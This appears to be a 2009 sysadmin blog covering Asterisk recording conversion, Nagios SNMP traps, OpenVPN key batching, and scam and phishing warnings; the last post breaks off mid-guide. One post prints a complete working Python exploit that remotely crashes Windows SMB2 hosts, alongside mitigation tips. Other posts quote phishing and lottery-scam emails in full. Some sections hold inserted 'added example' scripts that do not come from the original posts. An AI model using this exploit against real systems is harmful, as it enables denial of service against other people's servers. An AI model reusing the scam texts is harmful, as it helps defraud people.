Tuesday, November 17, 2009

Asterisk wav to mp3 call recording converter script

We found a great article and, combined with the comments and suggestions on it, we present a simple guide to get Asterisk WAV call recordings converted to MP3.

Source article: http://www.thiscoolsite.com/?p=73

My script is modified to use MLAME without modifying the date stamp, and since I had some problems with the script on the above site, I think this guide/script below will definitely work on Debian (tested on Lenny).

Enjoy.

Pre-req: Get LAME (it will already exist if you used our Asterisk Install Script)

cd /usr/src

wget http://downloads.sourceforge.net/project/lame/lame/3.98.2/lame-398-2.tar.gz?use_mirror=nchc

tar -zxvf lame-398-2.tar.gz

cd lame-398-2

./configure

make

make install

Copy MLAME

cp /usr/src/lame-398-2/misc/mlame /var/spool/asterisk/monitor/

chmod +x /var/spool/asterisk/monitor/mlame

Get Script

cd /usr/src

wget http://www.intuitinnovations.com/downloads/runconverter

chmod +x runconverter

Modify script – If needed

nano runconverter

Create a cron job with a line like this

[Edit] - Encountered some issues where the MP3 output is 0 kB... sigh. Will let you know what's up when I find a solution.

/usr/src/runconverter &> /dev/null

Quick test

./runconverter
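The post's runconverter script is only linked, not shown. The added example below is not that script; it is a minimal converter of my own that does the same job and guards against the 0 kB symptom mentioned in the edit above: the WAV is only deleted once the MP3 exists and is non-empty, the original timestamp is copied onto the MP3 with touch -r, and files Asterisk may still be writing are skipped. The encoder command ($ENCODER, default lame) and the recording directory ($MONITOR_DIR) are assumptions, not values from the post.

```shell
#!/bin/sh
# Added example, not the runconverter script from the post.
# Converts Asterisk WAV recordings to MP3 while keeping the original timestamp.
# Assumptions: encoder in $ENCODER (default lame, invoked as "lame in.wav out.mp3"),
# recordings in $MONITOR_DIR (default /var/spool/asterisk/monitor).

ENCODER="${ENCODER:-lame}"
MONITOR_DIR="${MONITOR_DIR:-/var/spool/asterisk/monitor}"

# convert_one WAVFILE -> writes WAVFILE with a .mp3 extension.
# Returns 0 on success; 1 missing input, 2 file still being written,
# 3 encoder failed, 4 encoder produced an empty (0 kB) file.
convert_one() {
    wav="$1"
    mp3="${wav%.wav}.mp3"
    [ -f "$wav" ] || return 1
    # skip recordings modified in the last 2 minutes: Asterisk may still be writing them
    if [ -n "$(find "$wav" -mmin -2 2>/dev/null)" ]; then
        return 2
    fi
    "$ENCODER" "$wav" "$mp3" >/dev/null 2>&1 || { rm -f "$mp3"; return 3; }
    # the 0 kB symptom: never treat an empty MP3 as a successful conversion
    if [ ! -s "$mp3" ]; then
        rm -f "$mp3"
        return 4
    fi
    touch -r "$wav" "$mp3"   # copy the recording's original timestamp onto the MP3
    rm -f "$wav"             # only now is it safe to drop the WAV
    return 0
}

# convert_dir DIR -> converts every *.wav in DIR; prints "<ok> <failed>"
convert_dir() {
    dir="$1"; ok=0; failed=0
    for f in "$dir"/*.wav; do
        [ -e "$f" ] || continue
        if convert_one "$f"; then ok=$((ok+1)); else failed=$((failed+1)); fi
    done
    echo "$ok $failed"
}

# Usage from cron, e.g.:  convert_dir "$MONITOR_DIR"
```

Because a WAV is kept whenever the MP3 comes out empty, a broken encoder run costs disk space rather than the recording itself, and the failed count in the cron output tells you something is wrong instead of silently leaving 0 kB files behind.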

Monday, November 16, 2009

choice: best SIP softphone for Windows

Ever used softphones that lock away many functions until you “unlock” them by purchasing the full version? Well, we all have, and we frown at those too. Softphones such as Zoiper and X-Lite are amongst the famous ones, but their free editions lack functionality such as call conferencing, forwarding, SIP over TCP, SIP over TLS, etc.

Well, after looking through *almost* all the softphones found in this article http://www.venturevoip.com/news.php?rssid=2188, I found one that I would rate almost 9/10 for being FREE plus its functionality.

Here’s PhonerLite, winner of the list of softphones (without IM or video):


Yes, yes, it doesn’t have a fancy skin or 3D images here and there, but this piece of software does everything those other free ones want you to pay money for. It lets you do conferencing, forwarding, SIP over TCP, SIP over TLS, IPv6, detailed logging, a phonebook and, yes, STATISTICS to see how good or bad the current connection is in real time. Wow, now that’s just awesome.

For those in a hurry to get it, here’s the download link: http://www.phonerlite.de/download_en.htm

There’s a BETA which you can play around with and test. You can also run it straight off a portable device without any install, with this file: http://www.phoner.de/PhonerLite.paf.exe

Installation is dead simple and straightforward. They even have a wizard to set up your account. One thing it lacks is an automatic start, but that isn’t much of a hassle to do in Windows: just make a shortcut to the executable and drag it into the “Startup” folder in your Start menu.

If you do try it and wonder how to conference, it’s easy. When a call comes in, just hit the conference button, dial another extension (or as many extensions as you wish) and everyone’s conferencing.


To forward, when a call comes in, dial another extension, then drag and drop the current call onto the intended recipient. Be careful not to drag and drop many calls; this software is not intended to replace a receptionist system such as FOP or a receptionist board.

Sunday, November 8, 2009

Nagios Receive SNMP Traps (with SNMPTT)

SNMPTT (SNMP Trap Translator) works with snmptrapd: it receives the traps, matches the IP of the trapping host to a host in Nagios, and submits a passive check result for that host's service so that Nagios alerts someone.

In the below guide:

[APC-UPS] –>send traps to–> [SNMPTRAPD –> SNMPTT –> NAGIOS]


Here’s a simple guide, adapted and made much more cut and dried (and a little simpler) from the guide found here.

We use Nagios 3.20, SNMPTT 1.3beta2, Debian Lenny (5). This below is fully tested based on Daniel’s script for installing Nagios 3.20 found here.

As usual, your feedback will mean a lot to us. Thanks!

Sanjay.

Download some pre-reqs
=======================

The main component is SNMP (plus some SNMP tools), so run this at the CLI:

apt-get install snmp snmpd libsnmp-dev

SNMPTT setup starts
===================

1) apt-get install unzip

2) cd /usr/src

3) wget http://search.cpan.org/CPAN/authors/id/C/CH/CHORNY/Text-ParseWords-3.27.zip

4) unzip Text-ParseWords-3.27.zip

5) cd Text-ParseWords-3.27

6) perl Makefile.PL

7) make test

8) make install

9) perl -MCPAN -e shell

At the Perl CLI
install YAML
install Getopt::Long
install Config::IniFiles
install Time::HiRes
install Sys::Hostname
install Text::Balanced
install Sys::Syslog
install DBI
install DBD::mysql
install Crypt::DES
install Digest::MD5
install Digest::SHA1
install Digest::HMAC
install Net::SNMP

Download, install and configure snmptt (the magician)
=====================================================

10) cd /usr/src

11) wget http://downloads.sourceforge.net/project/snmptt/snmptt/snmptt_1.3beta2/snmptt_1.3beta2.tgz?use_mirror=nchc

12) tar -zxvf snmptt_1.3beta2.tgz

13) cd snmptt_1.3beta2

14) cp snmptthandler /usr/sbin

15) cp snmptt /usr/sbin

16) cp snmpttconvert /usr/sbin

17) cp snmpttconvertmib /usr/sbin

Configure snmptrapd to not log but send them to snmptt
======================================================
18) nano /etc/snmp/snmptrapd.conf

19) Enter the following lines in there

traphandle default /usr/sbin/snmptt
disableAuthorization yes
donotlogtraps yes

Configure and enable the snmptrapd as a service
===============================================
20a) nano /etc/default/snmpd and /etc/init.d/snmpd

TRAPDRUN=yes
TRAPDOPTS='-On -Lsd -p /var/run/snmptrapd.pid'

20b) /etc/init.d/snmpd start

21) netstat -an | grep "162"
>> You should see a listener on UDP port 162

22) cd /usr/src/snmptt_1.3beta2

23) cp snmptt.ini /etc/snmp

24) nano /etc/snmp/snmptt.ini, look for and change the following settings

net_snmp_perl_enable = 1
dns_enable=1

25) cd /usr/src/nagios-plugins-1.4.13/

26) mkdir /usr/local/nagios/libexec/eventhandlers

27) cd /usr/local/nagios/libexec/eventhandlers

28) wget http://www.intuitinnovations.com/nagios/download312/submit_check_result

29) chmod +x submit_check_result

TESTING - Create sample to test
===============================
30) cd /usr/share/snmp/mibs
31) wget http://www.intuitinnovations.com/nagios/download312/PowerNet-MIB.mib

32) snmpttconvertmib --in=PowerNet-MIB.mib --out=/etc/snmp/snmptt.conf.apcpower --exec='/usr/local/nagios/libexec/eventhandlers/submit_check_result $r TRAP 1'

In the line above, you can change TRAP to any name as long as it matches the service name in Nagios; the 1 is the alert state: 0=OK, 1=WARNING, 2=CRITICAL, etc.

33) nano /etc/snmp/snmptt.ini

Add your generated trap file under [TrapFiles] and comment out the default snmptt.conf.
Example: here we added /etc/snmp/snmptt.conf.apcpower, the snmpttconvertmib output file from the step above.

[TrapFiles]
snmptt_conf_files = <<END
/etc/snmp/snmptt.conf.apcpower
END

Enable log rotation
=======================
34) nano /etc/logrotate.conf
This is for log rotation. Add the following line at the end

/var/log/snmptt/snmptt.log /var/log/snmptt/snmpttunknown.log
{
missingok
}

35) mkdir /var/log/snmptt

36) touch /var/log/snmptt/snmptt.log

37) touch /var/log/snmptt/snmpttunknown.log

Configuring hosts file
=======================
Traps carry the sender's IP, not its name, so we must add the name and IP of the device sending traps to us to /etc/hosts.

38) nano /etc/hosts

Add the following as sample

192.168.1.11 sanjaypc

>> Important! This name must be the same as the host name in your Nagios hosts.cfg file that will receive the traps.

Send a sample trap: load the same MIB into a program like iReasoning and send a trap to your Nagios IP
=======================================================

39) tail -f /var/log/snmptt/snmptt.log
Sun Nov 8 09:09:11 2009 .1.3.6.1.4.1.318.0.5 WARNING "Status Events" 192.168.157.1 - APC UPS: On battery: The UPS has switched to battery backup power.

40) tail -f /var/log/messages --- Output (after configuring the Nagios settings below, or at least having a host/service defined that matches sanjaypc and TRAP):
Nov 8 09:09:20 server1 nagios: PASSIVE SERVICE CHECK: sanjaypc;TRAP;1;APC UPS: On battery: The UPS has switched to battery backup power.
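The submit_check_result script downloaded in step 28 is what turns the translated trap into the PASSIVE SERVICE CHECK line shown above. The added example below is not that script; it is a minimal replacement of my own that writes the external command Nagios expects into its command file, so you can see exactly what the --exec line in step 32 produces. Assumptions not taken from the post: the Nagios command file path ($NAGIOS_CMD, default /usr/local/nagios/var/rw/nagios.cmd), and that everything after the third argument is the trap text used as plugin output.

```shell
#!/bin/sh
# Added example, not the submit_check_result script the post downloads.
# Called by snmptt via the --exec line from step 32, e.g.:
#   submit_check_result $r TRAP 1 "<trap text>"
# Assumptions: $NAGIOS_CMD is the Nagios external command file (named pipe);
# arguments 4.. are the plugin output text.

NAGIOS_CMD="${NAGIOS_CMD:-/usr/local/nagios/var/rw/nagios.cmd}"

# build_passive_cmd HOST SERVICE STATE OUTPUT... -> prints one external command in
# the documented Nagios format:
#   [timestamp] PROCESS_SERVICE_CHECK_RESULT;host;service;return_code;plugin_output
build_passive_cmd() {
    host="$1"; service="$2"; state="$3"; shift 3
    output="$*"
    # state must be a Nagios service return code: 0 OK, 1 WARNING, 2 CRITICAL, 3 UNKNOWN
    case "$state" in
        0|1|2|3) ;;
        *) echo "invalid state: $state" >&2; return 1 ;;
    esac
    # semicolons and newlines are field/record separators in the command file;
    # strip them so trap text can never inject a second command
    output=$(printf '%s' "$output" | tr -d ';\n')
    printf '[%s] PROCESS_SERVICE_CHECK_RESULT;%s;%s;%s;%s\n' \
        "$(date +%s)" "$host" "$service" "$state" "$output"
}

# submit_check_result HOST SERVICE STATE OUTPUT... -> appends the command to $NAGIOS_CMD
submit_check_result() {
    line=$(build_passive_cmd "$@") || return 1
    [ -w "$NAGIOS_CMD" ] || { echo "cannot write $NAGIOS_CMD" >&2; return 2; }
    printf '%s\n' "$line" >> "$NAGIOS_CMD"
}

# Usage, by hand or from snmptt:
#   submit_check_result sanjaypc TRAP 1 "APC UPS: On battery"
```

The host name in the first argument has to match the host_name of the service definition below (that is why the /etc/hosts entry in step 38 matters), and the service name has to match service_description; a mismatch is silently dropped by Nagios, which is the first thing to check when a trap shows up in snmptt.log but never in the Nagios UI.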

Configuring Nagios- Sample definitions
=====================================

trap-service template
=====================================

define service{
name generic-service
register 0
check_period 24x7
max_check_attempts 3
normal_check_interval 15
retry_check_interval 5
active_checks_enabled 1
passive_checks_enabled 0
parallelize_check 1
obsess_over_service 0
check_freshness 0
event_handler_enabled 0
flap_detection_enabled 0
process_perf_data 1
retain_status_information 1
retain_nonstatus_information 1
notification_interval 60
notification_period 24x7
notification_options w,u,c,r
notifications_enabled 1
}

define service{
name trap-service
use generic-service
register 0
service_description TRAP
is_volatile 1
check_command check-host-alive
max_check_attempts 1
normal_check_interval 1
retry_check_interval 1
passive_checks_enabled 1
check_period none
notification_interval 0
contact_groups admins
}

Create the service on the host - NOTE: the host name must match the /etc/hosts definition we created earlier
==================================================

define service{
host_name sanjaypc
use trap-service
contact_groups admins
}

41) Restart nagios

42) Send a trap again and check the Nagios website; the service should turn yellow [WARNING] and a notification should be sent out.

Nagios Send SNMP Traps

We hope this small guide can help you quickly set up SNMP traps sent out to a remote management host.

First, ensure that your Nagios box has the snmptrap binary and perhaps all other associated SNMP binaries installed. If you haven’t, a good start would be the following lines:

This guide was made using Nagios 3.2.0, Debian 5

Debian:

apt-get install snmp snmpd libsnmp-dev

Red Hat:

yum install net-snmp net-snmp-utils net-snmp-devel -y

In Nagios, we set up SNMP traps to be sent out to an HP OpenView box in our customer’s corporate network. These traps are sent as event handlers in Nagios. You may try doing them as normal notifications (I guess; haven’t tested).

So, each time there’s a state change (e.g. from OK to Warning), you will get, besides the standard notifications, an event that triggers an SNMP trap to the remote management host.

To keep things simple, we use existing config definitions such as the original commands.cfg and linux-services.cfg. The following guide attempts to send a trap when more than 2 or 3 users are logged onto the Nagios (localhost) box.

First, edit the commands.cfg file and add the following lines. I will explain what these lines mean.

define command{
   command_name send_snmptrap
   command_line /usr/bin/snmptrap -v 2c -c public 192.168.2.22 '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"
}

Simply copy and paste everything; the command_line should actually be a single line.

The command name can be anything you wish, just as long it’s mentioned correctly in the _x_services.cfg files.

/usr/bin/snmptrap -v 2c -c public 192.168.2.22…

This is quite straightforward: here we send an SNMPv2c trap with the community string public to the remote server 192.168.2.22.

…'' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcHostname s "$HOSTNAME$" nSvcDesc s "$SERVICEDESC$" nSvcStateID i $SERVICESTATEID$ nSvcOutput s "$SERVICEOUTPUT$"

This part firstly references the Nagios MIB so that we can use readable names such as nSvcDesc instead of numeric OIDs. It would be a good idea to give the Nagios MIB to the 3rd party remote monitoring host as well.

[EDIT: UPDATE: – The Nagios MIB has a wrong definition or its actually meant for V2 of Nagios. Use this MIB which should work for V3]

The next few fields are completely up to you and what you wish Nagios to output to the trap receiver. In my case, $HOSTNAME$ (the monitored host), $SERVICEDESC$ (the service description), $SERVICESTATEID$ (the Nagios state id, 0 for OK, 1 for warning, etc.) and $SERVICEOUTPUT$ (the additional info field from the plug-in) are sufficient. You may add more where you deem necessary.

The macros ($name$) are well documented in the Nagios documentation. The n(typeID) names are found in the MIB files, so do match them carefully. If a field's type is wrong, e.g. an Integer (i) sent as an octet string (s), your traps will fail. Whatever the case, you can simulate the trap at the CLI, for example:

snmptrap -v 2c -c public 192.168.2.22 '' NAGIOS-NOTIFY-MIB::nSvcEvent nSvcStateID s "$SERVICESTATEID$"

This will give errors as nSvcStateID in the MIB is expecting an Integer value, so changing to

nSvcStateID i $SERVICESTATEID$

will then work.
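Two things regularly break the one-line command_line above: a varbind sent with the wrong type (the nSvcStateID case just described) and a $SERVICEOUTPUT$ containing double quotes, which splits the snmptrap argument list. The added example below is not from the post; it is a small event-handler wrapper of my own that Nagios can call with the macros as separate arguments, so each value is its own argv element and the type of each varbind is fixed in one place. The script path, the $SNMPTRAP / $TRAP_DEST / $TRAP_COMMUNITY variables and the validate_state_id helper are assumptions; 192.168.2.22 and public are the values the post uses.

```shell
#!/bin/sh
# Added example, not from the post: event-handler wrapper around snmptrap.
# Assumptions: $SNMPTRAP is the snmptrap binary, $TRAP_DEST the receiver,
# $TRAP_COMMUNITY the community string. Install as e.g.
#   /usr/local/nagios/libexec/eventhandlers/send_snmptrap.sh
# and reference it from commands.cfg as
#   command_line .../send_snmptrap.sh "$HOSTNAME$" "$SERVICEDESC$" $SERVICESTATEID$ "$SERVICEOUTPUT$"

SNMPTRAP="${SNMPTRAP:-/usr/bin/snmptrap}"
TRAP_DEST="${TRAP_DEST:-192.168.2.22}"
TRAP_COMMUNITY="${TRAP_COMMUNITY:-public}"

# validate_state_id N -> 0 if N is a Nagios service state id (0 OK, 1 WARNING,
# 2 CRITICAL, 3 UNKNOWN); anything else would be rejected by the MIB's INTEGER type
validate_state_id() {
    case "$1" in 0|1|2|3) return 0 ;; *) return 1 ;; esac
}

# send_service_trap HOST DESC STATEID OUTPUT -> sends one nSvcEvent trap.
# Types follow NAGIOS-NOTIFY-MIB: s = OCTET STRING, i = INTEGER.
send_service_trap() {
    host="$1"; desc="$2"; state="$3"; output="$4"
    validate_state_id "$state" || { echo "bad state id: $state" >&2; return 1; }
    # '' is the sysUpTime argument (empty = let snmptrap fill it in).
    # Every value is passed as its own argument, so quotes or spaces in the
    # plugin output cannot break the command the way they can in a one-line command_line.
    "$SNMPTRAP" -v 2c -c "$TRAP_COMMUNITY" "$TRAP_DEST" '' NAGIOS-NOTIFY-MIB::nSvcEvent \
        nSvcHostname s "$host" \
        nSvcDesc s "$desc" \
        nSvcStateID i "$state" \
        nSvcOutput s "$output"
}

# Usage when run by Nagios: the four macros arrive as $1..$4.
#   send_service_trap "$1" "$2" "$3" "$4"
```

Keep in mind that SNMPv2c carries the community string in cleartext, so the receiver should only accept traps from the Nagios host's address.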

Now, the command to execute and send traps out is ready. Now we tell which service/host is to execute this command in a state change (triggering the event handler).

Here’s a sample of my linux-services.cfg

define service{
  use                         debian5-linuxservice
  host_name                   Nagios-Server
  service_description         Current Users
  event_handler               send_snmptrap
  event_handler_enabled       1
  check_command               check_local_users!2!3
  }

NOTE: The check_local_users thresholds are normally much higher, but for testing I just made it warn at 2 users and go critical at 3.

The only two parts i added from the normal service definition are;

event_handler            send_snmptrap
event_handler_enabled    1

That’s all that is needed for hosts or services to send traps out with the output configured above when a state change happens.

send_snmptrap is the logical name I created for that command in commands.cfg. Well, that’s about it. Simple, right? Now, just restart Nagios to enable the above configs.

/etc/init.d/nagios restart

And test the traps by submitting a passive check result in the Nagios web UI, for example as Warning or Critical.

Also, if you would like to test receiving traps, I can recommend the free iReasoning SNMP toolset. There’s a paid one if you like the rich features of this tool, but the free one, with its limited functions, is enough here.

Now, in iReasoning, launch the MIB Browser tool. Do load the Nagios MIB to make things much prettier: File >> Load MIBs and select Nagios-Notify-MIB. Then click Tools >> Trap Receiver.

As the remote management host value (in my case 192.168.2.22), enter the IP where iReasoning is running. If you have Windows Firewall enabled, ensure it allows incoming UDP port 162 for SNMP traps.

Trigger something and see it work. See sample from iReasoning below.

NOTE: Whenever you change something in the config files, remember to restart Nagios.


Please do comment and give further suggestions.

Shoutout to Daniel for figuring out the final bits with me … :)

Tuesday, October 13, 2009

Did someone ask you to update certificates? Well Don’t!

If you get an e-mail from just about anyone requesting you to update certificates on your computer: D.O.N.T.

The mail you get may look like this:

On October 16, 2009 server upgrade will take place. Due to this the system may be offline for approximately half an hour.

The changes will concern security, reliability and performance of mail service and the system as a whole.

For compatibility of your browsers and mail clients with upgraded server software you should run SSl certificates update procedure.

This procedure is quite simple. All you have to do is just to click the link provided, to save the patch file and then to run it from your computer location. That's all.

http://evil-link/evil-file

Thank you in advance for your attention to this matter and sorry for possible inconveniences.

This is a new breed of social engineering that attempts to fool someone into “updating” their certificates, which in fact installs the attacker's root certificate, thereby making all of his websites, software and anything else that uses certificates appear VALID.

This would then make it easier for someone to convince you that www.maybank2u.com.my is actually their own webserver as there won’t be any prompts saying the certificate is invalid.

In Windows, only use Windows Update to update your root certificates. This is done securely by Microsoft and MS is probably the folks you can trust in this case.

If you receive this and think it could be from an internal IT team, that’s probably not the case. Get the facts and ask your IT department.

Saturday, September 26, 2009

Office 2010 protects documents from untrusted sources like the internet

Typically, when you open something directly downloaded from the internet in MS Word or Excel, all components within that document such as internet links, scripts or procedures may be enabled (depending on your security level).

One feature I really like in Office 2010 is that the software “knows” which Office documents were downloaded via the internet, and treats and marks them as “public/unsafe”.

Documents opened in Protected View (as it’s called) are prevented from executing malicious code by sandboxing the application, i.e. isolating its process.

When launching a document in this mode, Task Manager shows two winword.exe processes (the Microsoft Word executable). Presumably one of them is the original application running in normal mode, and the one with the smaller memory footprint is probably the sandboxed one (reduced functionality).

Once you’ve accepted to edit (see the ENABLE EDITING button at the top right), the document runs in the normal process and the so-called sandboxed version is no longer in memory.

Protected view prevents application attacks that attempt to inject and run code by enabling features such as ASLR, DEP and /GH.

I like this. It helps users be automatically protected, view the content first (in case curiosity gets the better of you) and then decide to “enable” the document in normal view.

Good stuff!

Have a wonderful weekend.

Microsoft Internet Lottery Scam

These guys get smarter. To avoid being tagged as spam, they send the main content body as a Word document. So it sailed past the Hotmail antispam service and right into my inbox. Anyway, just sharing with you how ridiculously funny this is.

To top that, it comes from a yahoo address: evansokoli8@yahoo.com 

MICROSOFT INTERNET LOTTERY AWARD 2009

MORLEY HOUSE, 26-30 HOLBORN VIADUCTS,

LONDON EC1A 2BP.U.K.

Dear Email Owner,

We are pleased to inform you that you have won a prize money of GBP800,000.00 British Pounds (Eight Hundred Thousand British Pounds) Only for the email users this 2009 Prize promotion which is organized by MICROSOFT, We Collects all the email addresses of people worldwide, that are active online this 2009, among the millions that subscribed to MICROSOFT, HOTMAIL, YAHOO, GMAIL and few from other e-mail providers, 12 people are selected monthly to benefit from this promotion and you are one of the Selected Winners this month of SEPTEMBER 2009.

Your email address has therefore been approved to claim a total sum of (GBP800,000.00 BRITISH POUNDS) in cash.

FILE NUMBER: MIC/903/KPC/0108308/09.

1. Your Full Names:

2. Your Country:

3. Telephone Number:

4. Occupation:

5. Age:

To file for your claim, you are advised to contact our appointed paying bank below without any further delay, because your payment file has been forwarded to them for urgent payment of your winning prize, contact MR. STEPHEN HESTER Below as soon as you receive this massage and remember to forward him the Above File Number And Information’s which will help him to know that you are the rightful beneficiary, then he will instruction you on what to do next to receive your fund.

PAYMENT BANK CONTACT INFORMATION:

BANK NAME: ROYAL BANK OF SCOTLAND LONDON-UK

CONTACT PERSON: MR. STEPHEN HESTER

FOREIGN REMITTANCE DEPARTMENT

Tel: +44-703-174-7509

Fax: +44-870-471-8189

Tel/Fax: +44- 844-774-4940

Contact Email: stephenhester@mycin.net

WARNING: Any Prize that is not claim within 29 working days from the day you where notified will turn void and invalid, and You are advised to keep your winning information confidential until your claims are processed and your fund remitted to your bank account. This is part of our precautionary measure to avoid double claiming and unwarranted abuse of this program by some unscrupulous elements.

For more clarifications, please contact MR. JOHN WILLIAMS through his contact email address: johnwilliams63@live.co.uk

Congratulations once again,

Mr. Evans Okoli.

Head Customer care Service

Microsoft Promotion Team

Our special thanks and gratitude to Chairman CEO MICROSOFT Bill Gates and his associates we wish you the best of luck. Thank you for being part of our promotional award program and commemorative Anniversary.

© Copyright 2009 Microsoft Lottery promotion All Right Reserve"

Sunday, September 13, 2009

Forefront TMG NIS protects against SMB2.0 attacks


Microsoft has added protection against exploits targeting a vulnerability in the Server Message Block (SMB) implementation in mere hours. However, only customers running the Forefront TMG Network Inspection System can breathe easy. The Redmond-based company informed that the protection against the Critical zero-day vulnerability in SMB 2.0 was the first 0-Day signature release ever introduced to Forefront TMG NIS, according to Avi Ben-Menahem, Group Manager, Network Inspection System.

“In a matter of hours we completed root-cause analysis, signature development, testing and publishing of a new signature snapshot. During this process, which is driven by the Microsoft Malware Protection Center (MMPC), the team was able to demonstrate the agility of the core NIS technology and exercise the technologies and tools built over time to release a signature for the Vuln:Win/SMB2.Srv2.DoS!2009-3103 vulnerability in just a few hours,” Ben-Menahem revealed.

Want to try it out? Download here

Wednesday, September 9, 2009

Windows SMB2 'SRV2.SYS' Remote Denial of Service Exploit (and screen shots on Windows 2008 SP2)

There’s a simple exploit for the SMB2 protocol (implemented in the newer Microsoft OSes) that can easily remotely BSOD a Windows server or client. SRV2.SYS fails to handle malformed SMB headers in the NEGOTIATE PROTOCOL REQUEST functionality. The NEGOTIATE PROTOCOL REQUEST is the first SMB query a client sends to an SMB server, and it's used to identify the SMB dialect that will be used for further communication.

POC

Tried and tested this on Windows 2008 R2 x32 on VirtualBox and it crashed that bad boy the instant I pressed enter. At the time of posting, that same server, which is my AD server (meant for a security seminar in Penang), just won’t boot anymore… F@!@@!!!… and LOL at the same time.

I had to boot with “Last known good configuration” and that brought the DC up again.

The exploit was done on Debian.


Also tried it on my x64 Windows 7 RTM Build 7600 (also using SMB 2.0) but nothing happened. This means Microsoft was informed of the bug and fixed it in the RTM build.

All credits to Laurent Gaffié

Here’s the exploit code. You need to have file and print sharing enabled on Windows as well and of course, the firewall would allow file and print sharing from the network(s) that you are in.

#!/usr/bin/python
# When SMB2.0 receives a "&" char in the "Process Id High" SMB header field
# it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA

from socket import socket
from time import sleep

host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negotiate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
)
s = socket()
s.connect(host)
s.send(buff)
s.close()

Be responsible, exploit test machines only :D please

Mitigation techniques:

1) Disable SMB / File and Print Sharing (this is tough …i know)
2) Enable host level IDS to detect this signature or custom make your own.
3) Enable firewalls to block SMB traffic from unknown sources (with the hope no one does this in the so called trusted network)

The following platforms are vulnerable (I didn't test them personally though):

Microsoft Windows Vista x64 Edition SP2
Microsoft Windows Vista x64 Edition SP1
Microsoft Windows Vista x64 Edition 0
Microsoft Windows Vista Ultimate 64-bit edition SP2
Microsoft Windows Vista Ultimate 64-bit edition SP1
Microsoft Windows Vista Ultimate 64-bit edition 0
Microsoft Windows Vista Home Premium 64-bit edition SP2
Microsoft Windows Vista Home Premium 64-bit edition SP1
Microsoft Windows Vista Home Premium 64-bit edition 0
Microsoft Windows Vista Home Basic 64-bit edition SP2
Microsoft Windows Vista Home Basic 64-bit edition SP1
Microsoft Windows Vista Home Basic 64-bit edition 0
Microsoft Windows Vista Enterprise 64-bit edition SP2
Microsoft Windows Vista Enterprise 64-bit edition SP1
Microsoft Windows Vista Enterprise 64-bit edition 0
Microsoft Windows Vista Business 64-bit edition SP2
Microsoft Windows Vista Business 64-bit edition SP1
Microsoft Windows Vista Business 64-bit edition 0
Microsoft Windows Vista Ultimate SP2
Microsoft Windows Vista Ultimate SP1
Microsoft Windows Vista Ultimate
Microsoft Windows Vista Home Premium SP2
Microsoft Windows Vista Home Premium SP1
Microsoft Windows Vista Home Premium
Microsoft Windows Vista Home Basic SP2
Microsoft Windows Vista Home Basic SP1
Microsoft Windows Vista Home Basic
Microsoft Windows Vista Enterprise SP2
Microsoft Windows Vista Enterprise SP1
Microsoft Windows Vista Enterprise
Microsoft Windows Vista Business SP2
Microsoft Windows Vista Business SP1
Microsoft Windows Vista Business
Microsoft Windows 7 for x64-based Systems 0
Microsoft Windows 7 for Itanium-based Systems 0
Microsoft Windows 7 for 32-bit Systems 0
Microsoft Windows 7 beta

And to add from my test, Windows 2008 with SP2.

Microsoft posted this advisory, but basically it doesn’t fix anything; it is just a workaround that disables SMB(2): http://www.microsoft.com/technet/security/advisory/975497.mspx

Friday, September 4, 2009

openVPN easyrsa batch em "build-key"

We were deploying a solution for our customer, Pizza Hut/KFC Malaysia, which deploys pfSense as a VPN gateway and firewall to a little under 300 outlets in Malaysia.

Each outlet has a unique “storeID”, which is then required to run the OpenVPN daemon in the background and fire up a connection whenever a layer 2 link is established.

Creating just under 300 certificates using OpenVPN’s (v2.x.x) easy-rsa scripts on CentOS clients isn’t funny. So, being a lazy ass, I wrote a simple way to help create these files fast!

Assuming you’ve got the whole works with OpenVPN and pfSense sorted. If not read this great document here. Once you’ve got the server side done on pfSense, you will need to generate more keys for (in this case, Pizza Hut’s) 300 branches peer certificates.

Snail factor

  • build-key prompts, amongst other things, for the commonName (server name) each time a certificate is generated

What is needed?

  • To create store certificates automatically, without prompts, using a $variable$ to “insert” the commonName value. This means a certificate set will be created as storeID.key, storeID.crt and storeID.csr

How - Conceptually?

  1. Automate the build-key file to disable prompts
  2. Fire a variable into the system to pickup the $variable$ which then will be the filename and the commonName

How – Technically

(Assumptions – easyrsa is in /etc/openvpn/easyrsa and keys are in /etc/openvpn/easyrsa/keys. In /easyrsa, you have all the scripts like build-ca, build-key)

Create a file called build_batch into /etc/openvpn/easyrsa with the following lines. Make the file executable chmod +x build_batch

#!/bin/sh

# build_batch <name>: export the name for openssl.cnf to pick up as the
# default commonName, then run build-key non-interactively
if test $# -ne 1; then
    echo "usage: build_batch <name>";
    exit 1
else
    export KEY_CNAME=$1
    ./build-key $1
fi

Now, edit (nano/vi) the openssl.cnf file in /etc/openvpn/easyrsa and look for the following lines

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

Add a new line like below and save the file.

commonName            = Common Name (eg, your name or your server\'s hostname)
commonName_max            = 64

# Add this line below
commonName_default        = $ENV::KEY_CNAME

Now, edit (nano/vi) the build-key script in that same directory. At the end of the openssl req and openssl ca statements, add the -batch argument.

This is how that part of the original file looks

